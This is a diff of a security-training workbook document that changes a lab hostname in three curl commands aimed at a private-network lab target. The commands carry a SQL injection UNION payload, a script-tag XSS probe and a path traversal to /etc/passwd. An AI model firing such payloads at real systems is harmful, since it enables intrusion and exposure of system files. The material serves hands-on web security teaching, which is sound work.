--- a/contents/battle-workbook/web-vuln-w15.docx
+++ b/contents/battle-workbook/web-vuln-w15.docx
@@ -318,13 +318,13 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -A "wv15r1-kim" -H "Host: juice.6v6.lab" \</w:t>
+        <w:t>curl -s -A "wv15r1-kim" -H "Host: juice.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/rest/products/search?id=wv15r1-kim%27%20UNION%20SELECT%201--+&amp;Submit=Submit"</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: juice.6v6.lab" "http://192.168.0.161/rest/products/search?name=wv15r1-kim&lt;script&gt;1&lt;/script&gt;"</w:t>
+        <w:t>curl -s -H "Host: juice.el34.lab" "http://192.168.0.161/rest/products/search?name=wv15r1-kim&lt;script&gt;1&lt;/script&gt;"</w:t>
         <w:br/>
-        <w:t>curl -s -A "wv15r1-kim" -H "Host: juice.6v6.lab" "http://192.168.0.161/rest/products/search?file=wv15r1-kim/../../etc/passwd"</w:t>
+        <w:t>curl -s -A "wv15r1-kim" -H "Host: juice.el34.lab" "http://192.168.0.161/rest/products/search?file=wv15r1-kim/../../etc/passwd"</w:t>
       </w:r>
     </w:p>
     <w:p>
